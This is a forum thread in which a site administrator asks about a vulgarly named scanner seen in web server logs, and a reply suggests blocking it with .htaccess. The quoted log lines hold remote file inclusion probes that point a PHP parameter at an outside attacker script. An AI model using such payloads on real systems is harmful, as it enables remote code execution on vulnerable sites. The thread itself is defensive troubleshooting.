Jump to content

Odd, Vulger User Agent


lunex
 Share

Recommended Posts

Could someone explain why I see this?Could someone explain why I see this?

PS > (get-accesslog) -match 'morfeusfucking scanner' | select -first 2

82.165.28.95 - - [01/Jan/2007:22:08:46 -0700] "GET /bridge/enigma/E2_header.inc.php?boarddir=http://morfeus.us/M.php?&/ HTTP/1.1" 404 305 "-" "Morfeus Fucking Scanner"

82.165.28.95 - - [01/Jan/2007:22:08:47 -0700] "GET /WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://morfeus.us/M.php?&/ HTTP/1.1" 404 330 "-" "Morfeus Fucking Scanner"

:roll:

Spam bots are annoying but this ridiculous. Every time I get hit by that bot it queries about 360 pages over about 3 minutes.

I checked the root http page for the five IP address that I have received that UA from. One was "under construction," one appeared to be a car dealership, one appeared to be a forum, one was a blank page, and one had no http server. Judging from this I'd have to say MFS is a php virus, but I checked the urls given in the request and the only one that responded (that was, by the way, running Apache 1.3.22 :roll: ) just return the text "Morfeus hacked you" without the source to the virus.

Any ideas what this thing is?

Any ideas on how to kill it?

Any ideas on how to get it's source?

The source is probably useless, however, since the web servers that I managed to query were all outdated versions of apache.

Link to comment
Share on other sites

Use an .htacces file to block both the ip address and the User agent. Robots.txt will not work.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...